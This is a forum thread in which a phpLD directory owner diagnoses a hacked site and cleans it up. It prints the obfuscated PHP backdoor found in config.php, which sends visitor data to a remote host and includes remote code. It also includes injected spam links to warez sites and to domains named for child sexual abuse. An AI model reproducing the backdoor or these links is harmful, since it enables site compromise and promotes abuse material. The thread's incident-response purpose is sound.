My site at www.australianmusicdirectory.com (http://www.australianmusicdirectory.com) has been hacked. It is using version 2.0
The hack includes a series of links that are inserted above the <html> tag, but they are only visible if the user agent is set to Google Bot

The top of the page code from a "view source" is at the bottom of this post.
You can also see the inserted links in Google cache (http://72.14.253.104/search?q=cache:-WYmPdNpOdgJ:www.australianmusicdirectory.com/organisations/%3Fs%3DA+site:www.australianmusicdirectory.com&hl=en&ct=clnk&cd=2&gl=au)

I'm not saying that it is necessarily of directory vunerability, it may be that access was gained via some other script on the server. However, the problem I'm having is tracking down the hacked file(s) so I can correct.; has anybody come across this attack before? Do you know which file(s) has been changed?


---- view source --------------------

<a href="http://tomwestra.nl/mambo/administrator/components/com_facileforms/packages/bug-doctor-3038.html" target=_blank>bug doctor 3038</a><a href="http://www.best-comic-books.info.treamillpro.com/comic-books/comic-books-introduced/download.do.GTA3.para.PC.htm" title="download do GTA3 para PC">download do GTA3 para PC</a><a href="http://www.pretlow.org/crmtest1/modules/Schedulers/jobs/kodak-driver-c300.html" target=_blank>kodak driver c300</a><a href="http://www.eatingdisorderhelp.org/wsl/Fraps-2.6.0-crack-serial.html" title="Fraps 2.6.0 crack serial" target=_blank>Fraps 2.6.0 crack serial</a><a href="http://betterlifeweb.com/PHP-Nuke/modules/Statistics/cracks%20bejeweled.html">cracks bejeweled</a><a href="http://d3520518.u83.hacool.com/cache/Ultra-Mp3-for-Nokia-9210.html" title="Ultra Mp3 for Nokia 9210">Ultra Mp3 for Nokia 9210</a><a href="http://www.shiniz.com/sos/modules/PostCalendar/pntemplates/cache/8d2c8b298942cc382709739d1bc2e688/dowload-de-mensseger-5.0.html" title="dowload de mensseger 5.0" target=_blank>dowload de mensseger 5.0</a><a href="http://clifford-pc.org.uk/docs/pdf/irdeto2%2Bkey%2Bdownload.htm">irdeto2 key download</a><a href="http://www.bathyscaphos.com/content/components/com_comprofiler/images/english/serial-tmpeg-dvd-author.html">serial tmpeg dvd author</a><a href="http://www.rallymacmotors.com/images/cars/215/Humax.Fox.download.asp">Humax Fox download</a><a href="http://www.wanhoop.be/mailinglist/system/data/newsletter_templates/2/outkast-hey-ya-mpeg.html">outkast hey ya mpeg</a><a href="http://alleminemlyrics.treamillpro.com/eminem-50-cent-mp3/Activation.Cubase.htm">Activation Cubase</a><a href="http://www.yblogo.com/directory/Politics/National_Tobacco_Settlement/Mpeg2%20Nero6%20Dounload.html" title="Mpeg2 Nero6 Dounload">Mpeg2 Nero6 Dounload</a><a href="http://www.superuser.com.au/wiki/images/thumb/b/b6/Reason-3-key.html" title="Reason 3 key" target=_blank>Reason 3 key</a><a href="http://mfcnepal.com/gallery/albums/misc/oggy-and-the-cockroach.htm">oggy and the cockroach</a><a href="http://www.upsidedownhouse.com/store/skins/admin/en/images/fleshget_1.4_download.shtml">fleshget 1.4 download</a><a href="http://discretebook.com/escorts/Wisconsin/Appleton/down%20free%20loads%20video.jsp" target=_blank>down free loads video</a><a href="http://dev.dulygift.com.sg/catalog/images/silent.hill3.cd3.php" title="silent hill3 cd3" target=_blank>silent hill3 cd3</a><a href="http://www.drasticvisions.com/site/modules/gallery/albums/album39/smart_team_patch_4.0.02.htm" target=_blank>smart team patch 4.0.02</a><a href="http://www.urkrulez.nl/e107_plugins/coppermine_menu/albums/userpics/2004deel2/week50-1/sniffer%204.8%20warez.html" target=_blank>sniffer 4.8 warez</a><a href="http://www.dvd.immyonline.com/smarty_cache/list/IMMy/5/0/100/1/I/1/7%3D0/3%3D0/4%3D0/5%3D0/6%3D0/10%3D0/oberon-luxor-crack-key.html" title="oberon luxor crack key" target=_blank>oberon luxor crack key</a><a href="http://freemansphotographyweddings2.net/Gallery/albums/album05/bukkake-bath-hack.html">bukkake-bath hack</a><a href="http://www.frforums.com/images/avatars/boasnovas/Wrath.II.cheats.php" target=_blank>Wrath II cheats</a><a href="http://carmari.ch/g2data/cache/theme/slider/0/0/diablo-diablo-lod-hacks.html">diablo diablo lod hacks</a><a href="http://bronze.r2dzigns.com.au/administrator/components/com_menus/content_archive_category/neruda-poemas.html" title="neruda poemas">neruda poemas</a><a href="http://preteen-lolitas.net/">preteen lolitas</a><a href="http://sex**censored****censored****censored****censored* *teens.net/">preteen sex lolitas</a><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Australian Music Directory </title><meta http-equiv="Content-Type" content="text/html; charset=utf8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="description" content="A comprehensive directory of music and entertainment resources covering the entire spectrum of the music industry within Australia."><meta name="keywords" content="music, entertainment, directory, website, web, site, artist, entertainer, musician, band, group, record, cd"><link rel="stylesheet" type="text/css" href="/main.css" /></head><body><div align="center"><a href="http://www.australianmusicdirectory.com"><img src="http://www.australianmusicdirectory.com/images/header.jpg" alt="Directory of Australian Music" border="0" /></a></div><h1 id="title">Australian Music Directory</h1>

couple of things to check.

If it's not in the template files and not in the index.php
empty out your temp/templates folder.
If all is ok check your htaccess for file for a
php_value auto_prepend_file
if not there then lets move on
after all that this is probably a server hack (or your host) using the php prepend in php.ini or apache mod_layout ...

thanks Dawzz.
I went thru the code once again & this time I found what appears to be the cause.

In include/config.php, there was a line:
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

commenting it out eliminates the issue. I see that similar code exists in some other files.

I notice the version I am running is version 2.0.0 RC5.2 - I think the solution is to delete all files and upgrade.

thanks for your help!

And make sure after you re-install to drop writing permissions to all files and folders except /temp/

yes, put config.php permissions back to 644

It appears to me that I probably mistakenly left config.php at 777 when I did original install; I think it is most likely the hacked gained access via some other script on the shared server, and hence got into config.php 'cos of the permissions.

I don't believe it was a vunerability in phpLD itself.

I've deleted all files on the server, and upgraded to lastest version 2, and all looks good.
Thanks very much for your help!